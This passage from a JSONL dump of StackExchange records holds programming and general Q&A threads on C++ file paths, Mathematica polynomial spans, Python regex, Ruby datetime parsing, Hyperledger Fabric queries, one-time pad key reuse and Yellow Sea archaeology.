);\n\nGENERATE_ENV_VAR(FirstEnvVar)\nGENERATE_ENV_VAR(SecondEnvVar)\nGENERATE_ENV_VAR(ThirdEnvVar)\n<\/code>\nYou'll also notice that I moved your underscore to the end of the variable name, as leading underscores followed by uppercase letters are reserved to the compiler.\nAlso, the <code>vector<string><\/code> seems redundant. It may actually make more sense to have a central registry of <code>EnvVar<\/code> pointers that the class registers itself with, like this:\n<code>class EnvVar\n{ \n private:\n const char *const str;\n\n public:\n static vector<class EnvVar *> registry;\n\n EnvVar(const char *str_) : str(str_)\n {\n registry.push_back(this); \/\/ register ourselves\n }\n const char* GetEnvVarName() const\n {\n return str;\n }\n};\n<\/code>\nThen you can always walk through the complete registry of environment variables by iterating over <code>EnvVars::registry<\/code>. \nComment: but to fill the static vector, you need to go over the code. The point is that the code has not been over the code at that point yet. I want the GENERATE_ENV_VAR to be gone from the local scope. The point of it being a template class was me doing a test, because it generates code.\nComment: I see, you want to eliminate those macros at the global level. I missed that paragraph in the middle. Yeah, I don't see a way of, at compile time, generating this list. You might be able to do something really gross with `static` variables. Let me try something and get back to you.\nComment: Never mind... that won't work either because `static` vars aren't initialized until the block gets reached.\nComment: Quite a complex problem huh? Really been bugging my mind for a while.\nComment: Yeah, you might be better off with a post-processing script that runs `nm` on all the objects, looks for symbols with a particular name pattern, and then builds a table in a separate .cpp that gets compiled in at the end. (ie. solve it in the build process if you can.)\n","meta":{"source":"stackoverflow","title":"Compile-time usage introspection","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to check if 0 polynomial lies in span of some polynomials?\n\nQuestion: I have lot of polynomials like this\n<code>f1[a1_,x1_] := (a1 x1 + 1 - x1)\n\nf2[a2_,x2_] := (a2 x2 + 1 - x2)\n\nf3[a1_,x1_,a2_,x2_] := (a1 x1 + 1 - x1)*(a2 x2 + 1 - x2)\n\nf4[a1_,x1_,a2_,x2_] := (a1 x1 + 1 - x1)*(a2 x2 + 1 - x2)*x2\n\nf5[a1_,x1_,a2_,x2_] := (a1 x1 + 1 - x1)*(a2 x2 + 1 - x2)*(a1 x1 + 1 - x1)\n\nf6[a1_,x1_,a2_,x2_,a3_,x3_] := (a1 x1 + 1 - x1)*(a2 x2 + 1 - x2)*(a3 x3 + 1 -x3)\n<\/code>\nand so on...\nI want to know what integer linear combinations of these polynomials would result in a 0 polynomial. That is, I want to the set of all solutions for \n<code>c1 f1 + c2 f2 + c3 f3 + c4 f4 + c5 f5 + c6 f6 = 0\n<\/code>\nWhen I enter \n<code>Solve[c1 f1[a1_,x1_] + c2 f2[a2_,x2_] + c3 f3[a1_,x1_,a2_,x2_] + c4 f4[a1_,x1_,a2_,x2_] + c5 f5[a1_,x1_,a2_,x2_] + c6 f6[a1_,x1_,a2_,x2_,a3_,x3_] == 0, {c1,c2,c3,c4,c5,c6}]\n<\/code>\nmathematica just expresses one variable in terms of all others. That's not what I want. I want all non-trivial integer solutions for c1, c2, c3, c4, c5, c6 (some of them could be zero) such that the above equation is satisfied for all values of x1,x2,x3,a1,a2,a3. \nI could try to expand my polynomials and express it as a set of linear equations Mc=0, where the matrix M represents the coefficients of the polynomials. But unfortunately, when I expand my polynomials, they have exponential number of monomials, and I could not use this method even when problem size becomes bigger. \nAre there better ways to solve my problem?\nComment: [`SolveAlways`](https:\/\/reference.wolfram.com\/language\/ref\/SolveAlways.html)?\nComment: To start with, [`Blank`](http:\/\/reference.wolfram.com\/language\/ref\/Blank.html) is used on the LHS in the definition of a function, not when calling the function.\nComment: `FindInstance`?\nComment: You could substitute random integers for your variables.\nAnswer: You could try <code>SolveAlways<\/code>, but it only returns the trivial solution:\n<code>SolveAlways[\n c1 f1[a1,x1] + c2 f2[a2,x2] + c3 f3[a1,x1,a2,x2] + c4 f4[a1,x1,a2,x2] +\n c5 f5[a1,x1,a2,x2] + c6 f6[a1,x1,a2,x2,a3,x3] == 0,\n {x1,x2,x3,a1,a2,a3}\n]\n<\/code>\n\n{{c4 -> 0, c5 -> 0, c3 -> 0, c6 -> 0, c1 -> 0, c2 -> 0}}\nComment: That's nice! When I tried only some polynomials, mathematica gave an answer like {{b3 -> 0, b4 -> 0, b5 -> 0, b6 -> 0, b1 -> d9, d1 -> -d9, b2 -> d7, \n d2 -> -d7, d4 -> d7, d5 -> 0, d3 -> -d6 + d9, d8 -> 0}}. From this list, is there a way I could extract individual values, and substitute d7, d9, d6 with some numbers?\nComment: SolveAlways seems like a powerful tool. May I know how it works? For my application, the polynomials have small factors but I when I write it in canonical form, the polynomials have exponential number of monomials. Efficiency is my concern. If SolveAlways internally expands all the polynomials and expresses it as solving equation of Mc = 0. Then, it might not be efficient enough for my application.\n","meta":{"source":"mathematica.stackexchange","title":"How to check if 0 polynomial lies in span of some polynomials?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Are any archeological remains found from the Yellow Sea, China\n\nQuestion: During the last ice age when the sea level was lower, much of the continental shelf was exposed. For example, the North Sea was previously a low-lying region which is called \"Doggerland\".\nThere are multiple finds of bone fish-spears, flint axes and so on. Some are found by dredging, some by divers. These provide evidence that the region was inhabited by Mesolithic peoples. source1 source2 source3 \nAt that time the Yellow Sea, and particular the Bo Hai Bay, was above sea-level. And Neolithic China was featured multiple sites around the Yellow Sea. source4\nIs there archaeological evidence that the Bo Hai Bay and the Yellow Sea region were inhabited at the end of the ice age? Have there been any archaeological finds from the seabed?\nComment: I know this is the South China Sea, not the Yellow, but it is speculated that the ancestors of most modern native New Guinea highlanders actually *walked* there back when sea levels were lower. So there should be stuff to find, if one knew where to look.\nAnswer: My understanding is that Bohai Bay used to be an inland lake which drained into the Yellow Sea. The southern border of the lake was formed by the Liaodong and Shandong peninsulas, which were once joined.\nRemains of Pleistocene mammoth and woolly rhinoceros have been found in the bay, but, as far as I am aware, no human artefacts comparable with those found in \"Doggerland\" under the modern North Sea have yet been recovered.\nAs you say, a number of Neolithic cultures have been identified from sites around Bohai Bay, and there have been suggestions that there is evidence for \"economic contact\" between at least some of these groups (mentioned in the book linked above).\nIt makes sense that an area with readily available sources of food and water would have been attractive for human habitation at the end of the Pleistocene Ice Age. However, I've searched through the last 30 years of the International Journal of Nautical Archaeology, and I can't find any reports of significant evidence for human habitation from underwater archaeology in the region. (For comparison, I found more than 50 articles about remains from \"Doggerland\" while searching)\nComment: I came back to correct my incorrect correction, but you already fixed it.... \"two countries separated by a common language\".\nComment: Note: the spelling of [artefacts](https:\/\/en.oxforddictionaries.com\/definition\/artefact) isn't a typo.\nAnswer: The Yellow Sea flood plain has very rich soil with a climate very suitable for human habitation. I suspect that it was one of the major population centers during the last Ice Age. It would have been subject to a rapid and catastrophic flood when the ice dams broke raising the Sea level.\nSome very high volume rivers carry large amounts of silt into the Yellow Sea. Archeological evidence, if it exists, would probably be buried deep.\n","meta":{"source":"history.stackexchange","title":"Are any archeological remains found from the Yellow Sea, China","dup_signals":{}},"subset":"stackexchange"} +{"text":"Trying to open and read files with fstream and sstream\n\nQuestion: <code>#include <string>\n#include <fstream>\n#include <sstream>\n#include <iostream>\n\nint main()\n{\n const char* path = \"C:\\Dev\\devAstroides\\printFileToScreen\\Hello.txt\";\n std::string Code;\n std::ifstream File;\n File.exceptions(std::ifstream::failbit | std::ifstream::badbit);\n try\n {\n \/\/ open files\n File.open(path);\n std::stringstream Stream;\n \/\/ read file's buffer contents into streams\n Stream << File.rdbuf();\n \/\/ close file handlers\n File.close();\n \/\/ convert stream into string\n Code = Stream.str();\n }\n catch (std::ifstream::failure & e)\n {\n std::cout << \"ERROR::FILE_NOT_SUCCESFULLY_READ\" << std::endl;\n }\n\n std::cout << Code.c_str();\n}\n<\/code>\nThis is supposed to open a text file and print its content to the console.\nBut it doesn't work. The error message is always triggered and it doesn't print the file!\nI also wonder how one can replace the full file-path with a relative one, so it works on other computers, or if the project is moved.\nComment: `\\\u200b` is used for escape sequence in C++. You should use `\\\\\u200b` to represent `\\\u200b` in strings.\nComment: Using \/ as the path separator is also permitted in windows unless you are using unc paths. And you don't escape that.\nComment: I would expect that your compiler would warn you about invalid escape sequences.\nAnswer: If you output your path\n<code>const char* path = \"C:\\Dev\\devAstroides\\printFileToScreen\\Hello.txt\";\nstd::cout << path;\n<\/code>\nyou'll find the output is actually\n<code>C:DevdevAstroidesprintFileToScreenHello.txt \n<\/code>\nAs @MikeCAT pointed out you need to double escape your slashes by doubling them up. Like so\n<code>const char* path = \"C:\\\\Dev\\\\devAstroides\\\\printFileToScreen\\\\Hello.txt\";\n<\/code>\nSee below:\nhttps:\/\/en.cppreference.com\/w\/cpp\/language\/escape\nWith regards to a relative path, if your folders will sit with the executable in the same place then you can just use a relative path like normal. For example if there is a text file in the same folder as the application you can just set the path to\n<code>const char* path = \"Hello.txt\";\n<\/code>\nComment: In C++11 and later, you can alternatively use a [raw string literal](https:\/\/en.cppreference.com\/w\/cpp\/language\/string_literal) instead, then you don't need to ecape the ```\\``` characters: `const char* path = R\"(C:\\Dev\\devAstroides\\printFileToScreen\\Hello.txt)\";`\nComment: As for using relative paths, you are assuming the process's *working directory* is the same as the folder containing the EXE, but that is not a guarantee. You really should avoid using relative paths altogether, always use absolute paths. If you need to access paths relative to the EXE's location, then retrieve the EXE's actual location at runtime (from `main()`'s `argv[0]` parameter, or platform APIs like `GetModuleFileName()`, etc) and then manipulate that value to create full paths as needed.\n","meta":{"source":"stackoverflow","title":"Trying to open and read files with fstream and sstream","dup_signals":{}},"subset":"stackexchange"} +{"text":"Access 2007 Crosstab Query Expression\n\nQuestion: Goal: to create a percentage column based off the values of calculated columns.\nHere's the SQL code of the Crosstab query:\n<code>TRANSFORM Count(Master_Calendar.ID) AS CountOfID\nSELECT Master_Calendar.Analyst, Count(Master_Calendar.ID) AS [Total Of ID]\nFROM Master_Calendar\nGROUP BY Master_Calendar.Analyst\nPIVOT Master_Calendar.[Current Status];\n<\/code>\nThis gives me a crosstab query that displays the amount of entries in the database that are \"Completed\", \"In Process\", or \"Not Started\", sorted by which Analyst they belong to.\nWhat I'm trying to do is add another column to calculate the Percent Complete -- so (Completed \/ Total of ID) * 100. I tried putting that into an expression in another cell, but it returns with a \"[Completed]\" not found, even though it gives me it as an option in the Expression Builder.\nAm I just naming my variables wrong, or is it not possible to do it this way? Can I reference the total count of the records that contain \"Completed\" using query code instead of finding out the value using a Pivot table?\nThanks for your help.\nComment: You can use the crosstab query as if it were a table. Add it to the query design window and build the percentage column as you would for a table. Does this suit?\nComment: That's what I tried to do, but I can't get the expression correct\/valid.\nAnswer: Try:\n<code>SELECT \n xTab.Analyst,\n [Completed]\/([Total of ID]\/100) AS [Complete%], \n [In Process]\/([Total of ID]\/100) AS [In Process%],\n [Not Started]\/([Total of ID]\/100) AS [Not Started%]\nFROM xTab;\n<\/code>\nComment: Perfect -- didn't realize I should query a query. Thanks.\n","meta":{"source":"stackoverflow","title":"Access 2007 Crosstab Query Expression","dup_signals":{}},"subset":"stackexchange"} +{"text":"Secure multiparty computation protocols for stable matching?\n\nQuestion: Are you aware of papers proposing secure multiparty computation protocols for stable matching problems such as Stable Roommates and Stable Marriage problems?\nSpecifically, I would like the ranking of each party to be kept private and either reveal the whole output to everybody (all the pairings) or just reveal each pairing to the involved parties.\nComment: It can be done using a general MPC protocol, but I'm assuming you want something more efficient?\nComment: Yes, if it is not available yet, I would like to develop something ad-hoc that is efficient.\nAnswer: Is this what you were looking for? \nSecure Stable Matching at Scale by Jack Doerner, David Evans, and abhi shelat.\n","meta":{"source":"crypto.stackexchange","title":"Secure multiparty computation protocols for stable matching?","dup_signals":{}},"subset":"stackexchange"} +{"text":"One-time pad mistake in the transmission?\n\nQuestion: I have a question which arised by analyzing the one-time pad cipher. I encrypt a binary sequence $a_1,a_2,..,a_N$ using a one-time pad with key sequence $k_1,k_2,k_3,...$, so I send $a_1+k_1, a_2+k_2,\\dotsc,a_n+k_N$.\nNow I make mistake and instead of sending the above sequence I transmit $a_1+k_2,...,a_N+k_{N+1}$. Assuming now that you know that I made this error and that my message makes sense, can you find the message?\nRemark: Using a one-time pad means I encipher a message as $b_1b_2\\dots b_N$ where $b_j\\equiv a_j+k_j \\pmod q$ where $q$ is the size of the alphabet, in our case $q=2$.\nAnswer: Assuming that you have not used the one-time pad bits $k_2, ..., k_{N+1}$ to encrypt another message, then the answer is no, the attacker cannot determine the message.\nThis can be seen by using the normal proof of One Time Pad's security; the bits $k_2, ..., k_{N+1}$ are random and uncorrelated to any other bits the attacker has access to; hence the attacker gets no information on the values of $a_1, ..., a_N$ from the sequence $a_1+k_2, ..., a_N+k_{N+1}$. That those random uncorrelated bits are not the precise ones that you intended to use is irrelevant.\nOn the other hand, if the sender realized his mistake, and then sent $a_1+k_1, a_2+k_2, ..., a_N+k_N$, at that point, the attacker could deduce information about the message. This violates the restriction that \"bits from the one time pad are used only once\", and this actually allow the attacker to deduce the original message (or its complement).\nComment: Thanks for your answer. How would the attacker proceed at the point he has access to both sequences?\nComment: @TIJones: Well, he has both $a_1+k_2$ (from the first message) and $a_2+k_2$ (from the second); that gives him $a_1+a_2$. From that, he can (with $a_2+k_3$ and $a_3+k_3$) compute $a_1+a_3$. Continuing, he can reconstruct $a_1+a_i$ for all $i$. That, plus a guess of $a_1$, gives him the entire message.\n","meta":{"source":"crypto.stackexchange","title":"One-time pad mistake in the transmission?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Published URL File APP.CSS\n\nQuestion: I am crossing an analysis on a website and while fuzzing and testing I came across the below URL:\n<code>https\/\/www.****.**.*\/content\/css\/app.css\n<\/code>\nWhich generated the below output:\n<code>\/* Minification failed. Returning unminified contents.\n(856,107): run-time error CSS1036: Expected expression, found '}'\n(1838,90): run-time error CSS1019: Unexpected token, found '.'\n(1838,90): run-time error CSS1042: Expected function, found '.'\n(1838,90): run-time error CSS1019: Unexpected token, found '.'\n(1838,90): run-time error CSS1042: Expected function, found '.'\n(1838,90): run-time error CSS1062: Expected semicolon or closing curly-brace, found '.'\n(2353,12): run-time error CSS1038: Expected hex color, found '#fff9'\n(2353,17): run-time error CSS1062: Expected semicolon or closing curly-brace, found ' '\n *\/\n\/*!\n * Bootstrap v3.3.7 (http:\/\/getbootstrap.com)\n * Copyright 2011-2016 Twitter, Inc.\n * Licensed under MIT (https:\/\/github.com\/twbs\/bootstrap\/blob\/master\/LICENSE)etc.......\n<\/code>\nThe app.css should be accessible knowing that content and css directories are forbidden from server side. \nThe Question I am searching an answer for:\nDoes App.Css pose any security threat or issue from information disclosure perspective or can it be considered a vulnerability while published or is it a normal behavior ?\nComment: Why should the content and css directories be forbidden from server side?\nAnswer: It's a bit unusual to publish a CSS file which the minify process failed on, and may be indicative of other issues (e.g. insufficient monitoring of the deployment process), but CSS files are used by end user browsers, so the content shouldn't be sensitive. At most, it might include styles which are applied to pages or controls which the current user doesn't have access to, but applications should not rely on styling for access control, so this should not cause problems in a sensibly designed application.\n","meta":{"source":"security.stackexchange","title":"Published URL File APP.CSS","dup_signals":{}},"subset":"stackexchange"} +{"text":"Python multiline regular expression\n\nQuestion: <code>input = \"\"\"\nendless gibberish\nsome more stuff\n\ncolor texture mytexture\n [640 480 1]\n 'BE4C16FFBD4B15FFBD4B15FFBD4B15FFBD4B15FFBE4C16FFBE4C16FFBD4B15FFBD4B15FF'\n 'BE4C16FFBE4C16FFBD4B15FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBE4C16FF'\n 'BF4C16FFBF4C16FFBE4B15FFBE4B15FFBC4913FFBC4913FFBC4913FFBB4812FFBC4913FF'\n 'BC4A14FFBB4913FFBB4812FFBB4812FFBA4812FFBA4812FFBB4913FFBC4A16FFBB4915FF'\n 'B84612FFB84612FFB94713FFB84612FFB64410FFB64410FFB64410FFB4420EFFB3410DFF'\n 'FB03E0AFFB13F0BFB13F0BFFAE3C08FFAA3804FFAD3B07FFB03E0AFFB3410DFFB4420EFF'\n 'B4400DFFB13D0AFFB23C0AFFB03C09FFB23E0BFFB5410EFFB74310FFB94512FFB84411FF'\n\ncolor texture mytexture2\n [640 480 1]\n 'BE4C16FFBD4B15FFBD4B15FFBD4B15FFBD4B15FFBE4C16FFBE4C16FFBD4B15FFBD4B15FF'\n 'BE4C16FFBE4C16FFBD4B15FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBE4C16FF'\n (... etc...)\n\n\"\"\"\n<\/code>\nNeed to get the stuff between the brackets and the binary blob data after the line with \"texture\" until the empty line is reached. There's several \"texture\" paragraphs.\nHere's what I got thus far:\n<code>p = re.compile(r'texture\\s+(\\S+)\\s+\\[(\\d+\\s+\\d+\\s+\\d+)\\]\\s+(\\'.+\\')')\nmatches = p.findall(data)\n for match in matches:\n print match[0]\n print match[1]\n print match[2]\n print \"---------------\"\n<\/code>\nGives the following output:\n<code> mytexture\n 640 480 1\n 'BE4C16FFBD4B15FFBD4B15FFBD4B15FFBD4B15FFBE4C16FFBE4C16FFBD4B15FFBD4B15FF'\n ---------------\n mytexture2\n 640 480 1\n 'BE4C16FFBD4B15FFBD4B15FFBD4B15FFBD4B15FFBE4C16FFBE4C16FFBD4B15FFBD4B15FF'\n ---------------\n<\/code>\nI'm pretty sure re.MULTILINE should be used to get the whole blob, but its unclear to me how to grab all binary lines.\nMy question basically is: how does one grab multiple lines and know when to \"stop\" (ie: the empty line is reached).\nAnswer: <code>re.MULTILINE<\/code> affects the meaning of the <code>^<\/code> and <code>$<\/code> anchors. What I think you want here is <code>re.DOTALL<\/code>, without which the <code>.<\/code> character will never match a newline.\nTo match all of the text up to the next blank line, you'd use something like <code>(.*?)\\n\\s*\\n<\/code>. This seems to do what you're looking for?\n<code>p = re.compile(r'texture\\s+(\\S+)\\s+\\[(\\d+\\s+\\d+\\s+\\d+)\\]\\s+(.*?)\\n\\s*\\n', re.DOTALL)\nmatches = p.findall(input)\nfor match in matches:\n print match[0]\n print match[1]\n print match[2]\n print \"---------------\"\n<\/code>\nOn your sample text, this produces:\n<code>mytexture\n640 480 1\n'BE4C16FFBD4B15FFBD4B15FFBD4B15FFBD4B15FFBE4C16FFBE4C16FFBD4B15FFBD4B15FF'\n 'BE4C16FFBE4C16FFBD4B15FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBE4C16FF'\n 'BF4C16FFBF4C16FFBE4B15FFBE4B15FFBC4913FFBC4913FFBC4913FFBB4812FFBC4913FF'\n 'BC4A14FFBB4913FFBB4812FFBB4812FFBA4812FFBA4812FFBB4913FFBC4A16FFBB4915FF'\n 'B84612FFB84612FFB94713FFB84612FFB64410FFB64410FFB64410FFB4420EFFB3410DFF'\n 'FB03E0AFFB13F0BFB13F0BFFAE3C08FFAA3804FFAD3B07FFB03E0AFFB3410DFFB4420EFF'\n 'B4400DFFB13D0AFFB23C0AFFB03C09FFB23E0BFFB5410EFFB74310FFB94512FFB84411FF'\n---------------\nmytexture2\n640 480 1\n'BE4C16FFBD4B15FFBD4B15FFBD4B15FFBD4B15FFBE4C16FFBE4C16FFBD4B15FFBD4B15FF'\n 'BE4C16FFBE4C16FFBD4B15FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBE4C16FF'\n (... etc...)\n---------------\n<\/code>\nComment: Yes, this is exactly what i was looking for, thanks! I attemped re.DOTALL too, but failed to make the regexp \"stop\" on the empty line. Hence the `(.*?)\\n\\s*\\n` and DOTALL saves my day. Guess I was misunderstanding the MULTILINE flag too :S\nComment: I always have to go back and reread the documentation before using re.MULTILINE to make sure I'm using it properly. :-P\nAnswer: You were spot on, just didn't get so far as to actually implement it ;)\n<code>import re\n\ninput = \"\"\"\nendless gibberish\nsome more stuff\n\ntexture mytexture\n '01AB01AB01AB01BA'\n '01AB01AB01AB01BA'\n '01AB01AB01AB01BA'\n '01AB01AB01AB01BA'\n\n\"\"\"\n\nmatches = re.findall(r'01AB01AB01AB01BA', input, re.M)\nprint matches\n<\/code>\nComment: It makes me wonder if the OP even tried anything, since all you did is take their words and translate them directly into code.\nComment: My bad. And I was rightly punished by -2 rep. Hope the edited post is more clear.\n","meta":{"source":"stackoverflow","title":"Python multiline regular expression","dup_signals":{}},"subset":"stackexchange"} +{"text":"Convert string datetime to Ruby datetime\n\nQuestion: How do I convert this \"2013-10-20 18:36:40\" into a Ruby datetime?\nI'm trying the following, but it's not working:\n<code>\"2013-10-20 18:36:40\".to_datetime\n<\/code>\nThat's making it this and missing the time:\n<code>2013-10-20 00:00:00 UTC\n<\/code>\nComment: Your code will work if you precede it with `require 'active_support\/all'` (or just `require 'active_support\/core_ext\/string\/conversions'`) if you don't want to load it all.\nAnswer: Use <code>DateTime::strptime<\/code>:\n<code>require 'date'\nDateTime.strptime(\"2013-10-20 18:36:40\", \"%Y-%m-%d %H:%M:%S\")\n#<DateTime: 2013-10-20T18:36:40+00:00 ((2456586j,67000s,0n),+0s,2299161j)>\n<\/code>\nAnswer: There is also <code>DateTime#parse<\/code> method:\n<code>2.1.0 :001 > require 'date'\n => true \n2.1.0 :002 > DateTime.parse('2013-10-20 18:36:40')\n => #<DateTime: 2013-10-20T18:36:40+00:00 ((2456586j,67000s,0n),+0s,2299161j)> \n<\/code>\nIf your work with rails consider writing timezone-safe code:\n<code>Time.zone.parse(\"2013-10-20 18:36:40\")\n<\/code>\nhttp:\/\/www.elabs.se\/blog\/36-working-with-time-zones-in-ruby-on-rails\nAnswer: You can do the following if rails is installed on your system:--\n<code>require 'active_support\/core_ext\/string\/conversions'\n\n\"2013-10-20 18:36:40\".to_time\n\n1.9.2p320 :001 > require 'active_support\/core_ext\/string\/conversions'\n => true\n1.9.2p320 :003 > \"2013-10-20 18:36:40\".to_time\n => 2013-10-20 18:36:40 UTC \n<\/code>\nComment: active_support is available in rails, not in ruby.\n","meta":{"source":"stackoverflow","title":"Convert string datetime to Ruby datetime","dup_signals":{}},"subset":"stackexchange"} +{"text":"Checking if string is not equal to something is not working\n\nQuestion: Why isn't this working? The while loop won't end even when the value of <code>answer<\/code> is <code>\"Y\"<\/code> or <code>\"N\"<\/code> (I checked in the debugger) and I keep getting the Invalid Input message.\n<code> Console.Write(\"\\nYes or No(Y or N): \");\n\n string answer = Console.ReadLine();\n\n while(!answer.Equals(\"Y\") || !answer.Equals(\"N\"))\n {\n invalidInput();\n answer = Console.ReadLine();\n }\n<\/code>\nComment: `while(!answer.Equals(\"Y\") && !answer.Equals(\"N\"))`, notice `&&`\nComment: ANDDDD you need\nComment: Also be careful about case sensitivity...\nComment: @DmitryBychenko shouldn't it be || (OR) instead of && (AND), considering i want the user to pick one instead of both?\n\nEdit: my mistake, it should be with AND.\nComment: If the input was `Y` then `while(!answer.Equals(\"Y\") || !answer.Equals(\"N\"))` means `while(!true || !false)` so `while(false || true)`. It will **always** evaluate to `true`. Always.\nComment: `answer` will always evaluate to not equal to \"Y\" OR \"N\".\nComment: Fixed it, thanks everyone.\nComment: You are thinking of Java - @TimvanPeterson. C# doesn't work that way.\nAnswer: In order to avoid such errors (<code>||<\/code> instead of <code>&&<\/code>) put it like this:\n<code> \/\/ StringComparer.OrdinalIgnoreCase - let's ignore case and accept \"n\" or \"YES\"\n Dictionary<string, bool> validAnswers = new Dictionary<string, bool>(\n StringComparer.OrdinalIgnoreCase) {\n { \"Y\" , true},\n { \"N\", false},\n { \"Yes\" , true},\n { \"No\", false},\n \/\/ Add any other responses here, say {\"OK\", true}\n };\n\n Console.Write(\"\\nYes or No(Y or N): \");\n\n bool answer = false;\n\n \/\/ Keep asking while answer is not valid one\n \/\/ .Trim() - let's be nice and allow leading and trailing spaces\n while (!validAnswers.TryGetValue(Console.ReadLine().Trim(), out answer)) {\n invalidInput();\n } \n<\/code>\nComment: @user2366842: I've put `StringComparer.OrdinalIgnoreCase` (and added the comment) to ensure *case insensitive* correspondence. So all `yes`, `YES`, `Yes` will be valid and mapped to `true`\nComment: God damn that was fast. +1\nComment: The only thing this doesn't account for is case sensitivity on the input. Otherwise very nice answer. EDIT: looks good now.\nAnswer: You can put the two conditions in brackets.\nThe following example is also case-insensitive.\n<code>Console.Write(\"\\nYes or No(Y or N): \");\nstring answer = Console.ReadLine();\nwhile (!(answer.ToUpper().Equals(\"Y\") || answer.ToUpper().Equals(\"N\")))\n{\n invalidInput();\n answer = Console.ReadLine();\n}\n<\/code>\nComment: Good call on the case sensitivity. That's something that's often overlooked in questions like this.\nAnswer: A string can never be equal to two different strings. One or both of <code>answer.Equals(\"Y\")<\/code> <code>answer.Equals(\"N\")<\/code> will be false every time. With <code>! ||<\/code> the overall expression will true every time. \nI think you are looking for \n<code>!answer.Equals(\"Y\") && !answer.Equals(\"N\")\n<\/code>\nOr \n<code>!(answer.Equals(\"Y\") || answer.Equals(\"N\"))\n<\/code>\n","meta":{"source":"stackoverflow","title":"Checking if string is not equal to something is not working","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to query a value from a peer using Hyperledger Fabric SDK java\n\nQuestion: I have setup a HyperLedger Fabric V1.0 network with 2 organisations each having 2 peer and an orderer by following the steps Building Your First Network.\nI have started the network using \"sh byfn.sh -m up\" and compiled and executed chaincode that returns value for querying 'a' as 90.\nI want to write a code using Java Fabric SDK to only query a peer for a value using the docker network container started .\nCould you pls share the code segment for the same or give me references\nThanks\nAnswer: <code>\/\/ Channel queries\n\n\/\/ We can only send channel queries to peers that are in the same org as the SDK user context\n\/\/ Get the peers from the current org being used and pick one randomly to send the queries to.\nSet<Peer> peerSet = sampleOrg.getPeers();\n\/\/ Peer queryPeer = peerSet.iterator().next();\n\/\/ out(\"Using peer %s for channel queries\", queryPeer.getName());\n\nBlockchainInfo channelInfo = channel.queryBlockchainInfo();\nout(\"Channel info for : \" + channelName);\nout(\"Channel height: \" + channelInfo.getHeight());\nString chainCurrentHash = Hex.encodeHexString(channelInfo.getCurrentBlockHash());\nString chainPreviousHash = Hex.encodeHexString(channelInfo.getPreviousBlockHash());\nout(\"Chain current block hash: \" + chainCurrentHash);\nout(\"Chainl previous block hash: \" + chainPreviousHash);\n\n\/\/ Query by block number. Should return latest block, i.e. block number 2\nBlockInfo returnedBlock = channel.queryBlockByNumber(channelInfo.getHeight() - 1);\nString previousHash = Hex.encodeHexString(returnedBlock.getPreviousHash());\nout(\"queryBlockByNumber returned correct block with blockNumber \" + returnedBlock.getBlockNumber()\n + \" \\n previous_hash \" + previousHash);\nassertEquals(channelInfo.getHeight() - 1, returnedBlock.getBlockNumber());\nassertEquals(chainPreviousHash, previousHash);\n\n\/\/ Query by block hash. Using latest block's previous hash so should return block number 1\nbyte[] hashQuery = returnedBlock.getPreviousHash();\nreturnedBlock = channel.queryBlockByHash(hashQuery);\nout(\"queryBlockByHash returned block with blockNumber \" + returnedBlock.getBlockNumber());\nassertEquals(channelInfo.getHeight() - 2, returnedBlock.getBlockNumber());\n\n\/\/ Query block by TxID. Since it's the last TxID, should be block 2\nreturnedBlock = channel.queryBlockByTransactionID(testTxID);\nout(\"queryBlockByTxID returned block with blockNumber \" + returnedBlock.getBlockNumber());\nassertEquals(channelInfo.getHeight() - 1, returnedBlock.getBlockNumber());\n\n\/\/ query transaction by ID\nTransactionInfo txInfo = channel.queryTransactionByID(testTxID);\nout(\"QueryTransactionByID returned TransactionInfo: txID \" + txInfo.getTransactionID()\n + \"\\n validation code \" + txInfo.getValidationCode().getNumber());\n<\/code>\nThis is end to end test sample using Java SDK\nComment: this is fine but i want a java code to connect to a peer and just query it for a value .i have started the network docker container for first network . i want to access the peer image from java and send a query request to query for a value\nComment: an equivalent for peer chaincode query -n mycc -c '{\"Args\":[\"query\",\"a\"]}' -C myc\n","meta":{"source":"stackoverflow","title":"How to query a value from a peer using Hyperledger Fabric SDK java","dup_signals":{}},"subset":"stackexchange"} +{"text":"Notepad++ - Is it possible to use custom fonts?\n\nQuestion: Since I use different languages (Latin and non-Latin ones) in my work and some of them (for example Cyrillic languages) have symbols that look exactly the same as Latin ones, sometimes I get those stupid mistakes which are extremely hard to find when I accidentally use Cyrillic symbol in my code instead of the Latin one.\nFor example, the following variable names (PHP-style) look exactly the same, although half of the characters in the second name are Cyrillic symbols (and thus have different codes):\n<code> $iicuxiphametod vs $\u0456i\u0441u\u0445i\u0440h\u0430m\u0435t\u043ed\n<\/code>\nSo I've come up with idea of using for style configuration those fonts whose Latin and Cyrillic symbols have different appearance. I've found several fonts of that type - SimSun-ExtB, NSimSun, MingLiU-ExtB etc. - but the problem is that I'd like to use a font that I've created myself.\nDoes anybody know which fonts are used in the Notepad++? Are they it's own fonts or system fonts and is it possible to use different (non-system, user-created) font in Notepad++ (Settings->Style Configurator->Font Style) or just to edit existing one?\nComment: the list of font names you see in Style Configurator are system fonts (fonts that are installed to your OS). Why don't you install your user-created font to your OS?\nComment: When I check my font-lists under the Style-Configurator I get all of everything on my computer. Have you tried installing new fonts to test it, yet?\nComment: Thanks for your comments. No, I haven't tried it yet. I have to create my font first. I was just checking if that's possible.\nComment: since this particular question is already answered it would be nice if you could choose an answer as solution. thanks.\nAnswer: Settings -> Style Configurator...\nselect: Global Styles and Default Style\nat Font Style you can then select the default font wich is (in windows) in the systems font directory.\nAnswer: Its been a while since I've touched my Windows machine and with it Notepad++ but, from what memory I have of that time, when using notepad++ you should be able to change the font under settings\/preferences somewhere, and so long as your font is a valid font-set ie TTF or other supported format, all you have to do or should have to do is have it installed in your Windows font directory, and then in those settings\/prefs choose that font you created.\nComment: I'd kill for a version of TextWrangler on Windows\n","meta":{"source":"stackoverflow","title":"Notepad++ - Is it possible to use custom fonts?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to fix 'duplicate key issue of mongodb' after the version upgrade of other dependent projects in pom.xml\n\nQuestion: I updated the version of the dependent project to the newer one in my project. Now the tomcat doesn't start itself.\nIt is a spring boot application. I updated the version of the dependent project to the newer one in my project. Now when I run from embedded tomcat from 